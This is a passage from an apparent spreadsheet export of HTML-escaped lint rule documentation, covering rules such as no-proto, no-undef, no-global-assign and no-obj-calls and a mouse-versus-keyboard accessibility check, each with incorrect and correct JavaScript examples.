&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-func-assign: "error"*/
function foo() {}
foo = bar;
function foo() {
    foo = bar;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule, unlike the corresponding rule in JSHint:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-func-assign: "error"*/
foo = bar;
function foo() {}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-func-assign: "error"*/
var foo = function () {}
foo = bar;
function foo(foo) { // `foo` is shadowed.
    foo = bar;
}
function foo() {
    var foo = bar;  // `foo` is shadowed.
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-proto</t>
  </si>
  <si>
    <t>disallow the use of the `__proto__` property</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;__proto__&lt;/code&gt; property has been deprecated as of ECMAScript 3.1 and shouldn't be used in the code. Use &lt;code&gt;getPrototypeOf&lt;/code&gt; method instead.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;When an object is created &lt;code&gt;__proto__&lt;/code&gt; is set to the original prototype property of the objectâ€™s constructor function. &lt;code&gt;getPrototypeOf&lt;/code&gt; is the preferred method of getting "the prototype".&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-proto: "error"*/
var a = obj.__proto__;
var a = obj["__proto__"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-proto: "error"*/
var a = Object.getPrototypeOf(obj);
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you need to support legacy browsers, you might want to turn this rule off, since support for &lt;code&gt;getPrototypeOf&lt;/code&gt; is not yet universal.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://ejohn.org/blog/objectgetprototypeof/"&gt;Object.getPrototypeOf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-extra-bind</t>
  </si>
  <si>
    <t>disallow unnecessary calls to `.bind()`</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;bind()&lt;/code&gt; method is used to create functions with specific &lt;code&gt;this&lt;/code&gt; values and, optionally, binds arguments to specific values. When used to specify the value of &lt;code&gt;this&lt;/code&gt;, it's important that the function actually use &lt;code&gt;this&lt;/code&gt; in its function body. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var boundGetName = (function getName() {
    return this.name;
}).bind({ name: "ESLint" });
console.log(boundGetName());      // "ESLint"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code is an example of a good use of &lt;code&gt;bind()&lt;/code&gt; for setting the value of &lt;code&gt;this&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Sometimes during the course of code maintenance, the &lt;code&gt;this&lt;/code&gt; value is removed from the function body. In that case, you can end up with a call to &lt;code&gt;bind()&lt;/code&gt; that doesn't accomplish anything:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;// useless bind
var boundGetName = (function getName() {
    return "ESLint";
}).bind({ name: "ESLint" });
console.log(boundGetName());      // "ESLint"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this code, the reference to &lt;code&gt;this&lt;/code&gt; has been removed but &lt;code&gt;bind()&lt;/code&gt; is still used. In this case, the &lt;code&gt;bind()&lt;/code&gt; is unnecessary overhead (and a performance hit) and can be safely removed.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at avoiding the unnecessary use of &lt;code&gt;bind()&lt;/code&gt; and as such will warn whenever an immediately-invoked function expression (IIFE) is using &lt;code&gt;bind()&lt;/code&gt; and doesn't have an appropriate &lt;code&gt;this&lt;/code&gt; value. This rule won't flag usage of &lt;code&gt;bind()&lt;/code&gt; that includes function argument binding.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Arrow functions can never have their &lt;code&gt;this&lt;/code&gt; value set using &lt;code&gt;bind()&lt;/code&gt;. This rule flags all uses of &lt;code&gt;bind()&lt;/code&gt; with arrow functions as a problem&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-bind: "error"*/
/*eslint-env es6*/
var x = function () {
    foo();
}.bind(bar);
var x = (() =&amp;gt; {
    foo();
}).bind(bar);
var x = (() =&amp;gt; {
    this.foo();
}).bind(bar);
var x = function () {
    (function () {
      this.foo();
    }());
}.bind(bar);
var x = function () {
    function foo() {
      this.bar();
    }
}.bind(baz);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-bind: "error"*/
var x = function () {
    this.foo();
}.bind(bar);
var x = function (a) {
    return a + 1;
}.bind(foo, bar);
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you are not concerned about unnecessary calls to &lt;code&gt;bind()&lt;/code&gt;, you can safely disable this rule.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/bind"&gt;Function.prototype.bind&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.smashingmagazine.com/2014/01/understanding-javascript-function-prototype-bind/"&gt;Understanding JavaScript's Function.prototype.bind&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-ex-assign</t>
  </si>
  <si>
    <t>disallow reassigning exceptions in `catch` clauses</t>
  </si>
  <si>
    <t>&lt;p&gt;If a &lt;code&gt;catch&lt;/code&gt; clause in a &lt;code&gt;try&lt;/code&gt; statement accidentally (or purposely) assigns another value to the exception parameter, it impossible to refer to the error from that point on.
Since there is no &lt;code&gt;arguments&lt;/code&gt; object to offer alternative access to this data, assignment of the parameter is absolutely destructive.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows reassigning exceptions in &lt;code&gt;catch&lt;/code&gt; clauses.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-ex-assign: "error"*/
try {
    // code
} catch (e) {
    e = 10;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-ex-assign: "error"*/
try {
    // code
} catch (e) {
    var foo = 10;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://bocoup.com/blog/the-catch-with-try-catch"&gt;The "catch" with tryâ€¦catch&lt;/a&gt; by Ben Alman explains how the exception identifier can leak into the outer scope in IE 6-8&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-control-regex</t>
  </si>
  <si>
    <t>disallow control characters in regular expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Control characters are special, invisible characters in the ASCII range 0-31. These characters are rarely used in JavaScript strings so a regular expression containing these characters is most likely a mistake.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows control characters in regular expressions.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-control-regex: "error"*/
var pattern1 = /\x1f/;
var pattern2 = new RegExp("\x1f");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-control-regex: "error"*/
var pattern1 = /\x20/;
var pattern2 = new RegExp("\x20");
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you need to use control character pattern matching, then you should turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-undef</t>
  </si>
  <si>
    <t>disallow the use of undeclared variables unless mentioned in `/*global */` comments</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule can help you locate potential ReferenceErrors resulting from misspellings of variable and parameter names, or accidental implicit globals (for example, from forgetting the &lt;code&gt;var&lt;/code&gt; keyword in a &lt;code&gt;for&lt;/code&gt; loop initializer).&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;Any reference to an undeclared variable causes a warning, unless the variable is explicitly mentioned in a &lt;code&gt;/*global ...*/&lt;/code&gt; comment, or specified in the &lt;a href="https://eslint.org/docs/user-guide/configuring#specifying-globals"&gt;&lt;code&gt;globals&lt;/code&gt; key in the configuration file&lt;/a&gt;. A common use case for these is if you intentionally use globals that are defined elsewhere (e.g. in a script sourced from HTML).&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/
var a = someFunction();
b = 10;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with &lt;code&gt;global&lt;/code&gt; declaration:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*global someFunction b:true*/
/*eslint no-undef: "error"*/
var a = someFunction();
b = 10;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;b:true&lt;/code&gt; syntax in &lt;code&gt;/*global */&lt;/code&gt; indicates that assignment to &lt;code&gt;b&lt;/code&gt; is correct.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with &lt;code&gt;global&lt;/code&gt; declaration:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*global b*/
/*eslint no-undef: "error"*/
b = 10;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By default, variables declared in &lt;code&gt;/*global */&lt;/code&gt; are read-only, therefore assignment is incorrect.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;typeof&lt;/code&gt; set to true will warn for variables used inside typeof check (Default false).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="typeof"&gt;typeof&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;{ "typeof": false }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/
if (typeof UndefinedIdentifier === "undefined") {
    // do something ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You can use this option if you want to prevent &lt;code&gt;typeof&lt;/code&gt; check on a variable which has not been declared.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "typeof": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: ["error", { "typeof": true }] */
if(typeof a === "string"){}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "typeof": true }&lt;/code&gt; option with &lt;code&gt;global&lt;/code&gt; declaration:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*global a*/
/*eslint no-undef: ["error", { "typeof": true }] */
if(typeof a === "string"){}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="environments"&gt;Environments&lt;/h2&gt;
&lt;p&gt;For convenience, ESLint provides shortcuts that pre-define global variables exposed by popular libraries and runtime environments. This rule supports these environments, as listed in &lt;a href="../user-guide/configuring.md#specifying-environments"&gt;Specifying Environments&lt;/a&gt;.  A few examples are given below.&lt;/p&gt;
&lt;h3 id="browser"&gt;browser&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with &lt;code&gt;browser&lt;/code&gt; environment:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/
/*eslint-env browser*/
setTimeout(function() {
    alert("Hello");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="nodejs"&gt;Node.js&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with &lt;code&gt;node&lt;/code&gt; environment:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/
/*eslint-env node*/
var fs = require("fs");
module.exports = function() {
    console.log(fs);
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If explicit declaration of global variables is not to your taste.&lt;/p&gt;
&lt;h2 id="compatibility"&gt;Compatibility&lt;/h2&gt;
&lt;p&gt;This rule provides compatibility with treatment of global variables in &lt;a href="http://jshint.com/"&gt;JSHint&lt;/a&gt; and &lt;a href="http://www.jslint.com"&gt;JSLint&lt;/a&gt;.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-shadow-restricted-names</t>
  </si>
  <si>
    <t>disallow identifiers from shadowing restricted names</t>
  </si>
  <si>
    <t>&lt;p&gt;ES5 Â§15.1.1 Value Properties of the Global Object (&lt;code&gt;NaN&lt;/code&gt;, &lt;code&gt;Infinity&lt;/code&gt;, &lt;code&gt;undefined&lt;/code&gt;) as well as strict mode restricted identifiers &lt;code&gt;eval&lt;/code&gt; and &lt;code&gt;arguments&lt;/code&gt; are considered to be restricted names in JavaScript. Defining them to mean something else can have unintended consequences and confuse others reading the code. For example, there's nothing prevent you from writing:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var undefined = "foo";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then any code used within the same scope would not get the global &lt;code&gt;undefined&lt;/code&gt;, but rather the local version with a very different meaning.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-shadow-restricted-names: "error"*/
function NaN(){}
!function(Infinity){};
var undefined;
try {} catch(eval){}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-shadow-restricted-names: "error"*/
var Object;
function f(a, b){}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://es5.github.io/#x15.1.1"&gt;Annotated ES5 - Â§15.1.1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://es5.github.io/#C"&gt;Annotated ES5 - Annex C&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-label-var</t>
  </si>
  <si>
    <t>disallow labels that share a name with a variable</t>
  </si>
  <si>
    <t>&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule aims to create clearer code by disallowing the bad practice of creating a label that shares a name with a variable that is in scope.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-label-var: "error"*/
var x = foo;
function bar() {
x:
  for (;;) {
    break x;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-label-var: "error"*/
// The variable that has the same name as the label is not in scope.
function foo() {
  var q = t;
}
function bar() {
q:
  for(;;) {
    break q;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you don't want to be notified about usage of labels, then it's safe to disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-invalid-regexp</t>
  </si>
  <si>
    <t>disallow invalid regular expression strings in `RegExp` constructors</t>
  </si>
  <si>
    <t>&lt;p&gt;An invalid pattern in a regular expression literal is a &lt;code&gt;SyntaxError&lt;/code&gt; when the code is parsed, but an invalid string in &lt;code&gt;RegExp&lt;/code&gt; constructors throws a &lt;code&gt;SyntaxError&lt;/code&gt; only when the code is executed.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows invalid regular expression strings in &lt;code&gt;RegExp&lt;/code&gt; constructors.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-invalid-regexp: "error"*/
RegExp('[')
RegExp('.', 'z')
new RegExp('\\')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-invalid-regexp: "error"*/
RegExp('.')
new RegExp
this.RegExp('[')
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="environments"&gt;Environments&lt;/h2&gt;
&lt;p&gt;ECMAScript 6 adds the following flag arguments to the &lt;code&gt;RegExp&lt;/code&gt; constructor:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"u"&lt;/code&gt; (&lt;a href="https://people.mozilla.org/~jorendorff/es6-draft.html#sec-get-regexp.prototype.unicode"&gt;unicode&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"y"&lt;/code&gt; (&lt;a href="https://people.mozilla.org/~jorendorff/es6-draft.html#sec-get-regexp.prototype.sticky"&gt;sticky&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can enable these to be recognized as valid by setting the ECMAScript version to 6 in your &lt;a href="../user-guide/configuring"&gt;ESLint configuration&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you want to allow additional constructor flags for any reason, you can specify them using an &lt;code&gt;allowConstructorFlags&lt;/code&gt; option in &lt;code&gt;.eslintrc&lt;/code&gt;. These flags will then be ignored by the rule regardless of the &lt;code&gt;ecmaVersion&lt;/code&gt; setting.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"allowConstructorFlags"&lt;/code&gt; is an array of flags&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="allowconstructorflags"&gt;allowConstructorFlags&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowConstructorFlags": ["u", "y"] }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-invalid-regexp: ["error", { "allowConstructorFlags": ["u", "y"] }]*/
new RegExp('.', 'y')
new RegExp('.', 'yu')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A list of valid flags for regular expressions is available &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://es5.github.io/#x7.8.5"&gt;Annotated ES5 Â§7.8.5 - Regular Expression Literals&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-global-assign</t>
  </si>
  <si>
    <t>disallow assignment to native objects</t>
  </si>
  <si>
    <t>&lt;h1 id="disallowassignmenttonativeobjectsorreadonlyglobalvariablesnoglobalassign"&gt;Disallow assignment to native objects or read-only global variables (no-global-assign)&lt;/h1&gt;
&lt;p&gt;JavaScript environments contain a number of built-in global variables, such as &lt;code&gt;window&lt;/code&gt; in browsers and &lt;code&gt;process&lt;/code&gt; in Node.js. In almost all cases, you don't want to assign a value to these global variables as doing so could result in losing access to important functionality. For example, you probably don't want to do this in browser code:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;window = {};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While examples such as &lt;code&gt;window&lt;/code&gt; are obvious, there are often hundreds of built-in global objects provided by JavaScript environments. It can be hard to know if you're assigning to a global variable or not.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows modifications to read-only global variables.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/
Object = null
undefined = 1
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/
/*eslint-env browser*/
window = {}
length = 1
top = 1
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/
/*globals a:false*/
a = 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/
a = 1
var b = 1
b = 2
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/
/*eslint-env browser*/
onload = function() {}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/
/*globals a:true*/
a = 1
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule accepts an &lt;code&gt;exceptions&lt;/code&gt; option, which can be used to specify a list of builtins for which reassignments will be allowed:&lt;/p&gt;
&lt;pre&gt;&lt;code class="json language-json"&gt;{
    "rules": {
        "no-global-assign": ["error", {"exceptions": ["Object"]}]
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you are trying to override one of the native objects.&lt;/p&gt;</t>
  </si>
  <si>
    <t>vf:MouseEventWithoutKeyboardEquivalentCheck</t>
  </si>
  <si>
    <t>Mouse Events should have Equivalent Keyboard Events</t>
  </si>
  <si>
    <t>Offering the same experience with the mouse and the keyboard allow users to pick their preferred device.
Additionally, users of assistive technology will also be able to browse the site even if they cannot use the mouse.
&lt;p&gt;The following code:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;a onClick="doSomething();" ...&amp;gt;                                //Bad: 'onKeyPress' is missing.
&amp;lt;a onMouseover="doSomething();" ...&amp;gt;                            //Bad: 'onFocus' is missing.
&amp;lt;a onMouseout="doSomething();" ...&amp;gt;                             //Bad: 'onBlur' is missing.
&lt;/pre&gt;
&lt;p&gt;should be refactored into:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;a onClick="doSomething();" onKeyPress="doSomething();" ...&amp;gt;    //Good: preferred approach.
&amp;lt;a onMouseover="doSomething();" onFocus="doSomething();" ...&amp;gt;   //Good: preferred approach.
&amp;lt;a onMouseout="doSomething();" onBlur="doSomething();" ...&amp;gt;     //Good: preferred approach.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-extra-boolean-cast</t>
  </si>
  <si>
    <t>disallow unnecessary boolean casts</t>
  </si>
  <si>
    <t>&lt;p&gt;In contexts such as an &lt;code&gt;if&lt;/code&gt; statement's test where the result of the expression will already be coerced to a Boolean, casting to a Boolean via double negation (&lt;code&gt;!!&lt;/code&gt;) or a &lt;code&gt;Boolean&lt;/code&gt; call is unnecessary. For example, these &lt;code&gt;if&lt;/code&gt; statements are equivalent:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;if (!!foo) {
    // ...
}
if (Boolean(foo)) {
    // ...
}
if (foo) {
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows unnecessary boolean casts.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-boolean-cast: "error"*/
var foo = !!!bar;
var foo = !!bar ? baz : bat;
var foo = Boolean(!!bar);
var foo = new Boolean(!!bar);
if (!!foo) {
    // ...
}
if (Boolean(foo)) {
    // ...
}
while (!!foo) {
    // ...
}
do {
    // ...
} while (Boolean(foo));
for (; !!foo; ) {
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-boolean-cast: "error"*/
var foo = !!bar;
var foo = Boolean(bar);
function foo() {
    return !!bar;
}
var foo = bar ? !!baz : !!bat;
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-obj-calls</t>
  </si>
  <si>
    <t>disallow calling global object properties as functions</t>
  </si>
  <si>
    <t>&lt;p&gt;ECMAScript provides several global objects that are intended to be used as-is. Some of these objects look as if they could be constructors due their capitalization (such as &lt;code&gt;Math&lt;/code&gt; and &lt;code&gt;JSON&lt;/code&gt;) but will throw an error if you try to execute them as functions.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://es5.github.io/#x15.8"&gt;ECMAScript 5 specification&lt;/a&gt; makes it clear that both &lt;code&gt;Math&lt;/code&gt; and &lt;code&gt;JSON&lt;/code&gt; cannot be invoked:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The Math object does not have a &lt;code&gt;[[Call]]&lt;/code&gt; internal property; it is not possible to invoke the Math object as a function.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And the &lt;a href="https://www.ecma-international.org/ecma-262/6.0/index.html#sec-reflect-object"&gt;ECMAScript 2015 specification&lt;/a&gt; makes it clear that &lt;code&gt;Reflect&lt;/code&gt; cannot be invoked:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The Reflect object also does not have a &lt;code&gt;[[Call]]&lt;/code&gt; internal method; it is not possible to invoke the Reflect object as a function.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows calling the &lt;code&gt;Math&lt;/code&gt;, &lt;code&gt;JSON&lt;/code&gt; and &lt;code&gt;Reflect&lt;/code&gt; objects as functions.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-obj-calls: "error"*/
var math = Math();
var json = JSON();
var reflect = Reflect();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-obj-calls: "error"*/
function area(r) {
    return Math.PI * r * r;
}
var object = JSON.parse("{}");
var value = Reflect.get({ x: 1, y: 2 }, "x");
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://es5.github.io/#x15.8"&gt;The Math Object&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-unreachable</t>
  </si>
  <si>
    <t>disallow unreachable code after `return`, `throw`, `continue`, and `break` statements</t>
  </si>
  <si>
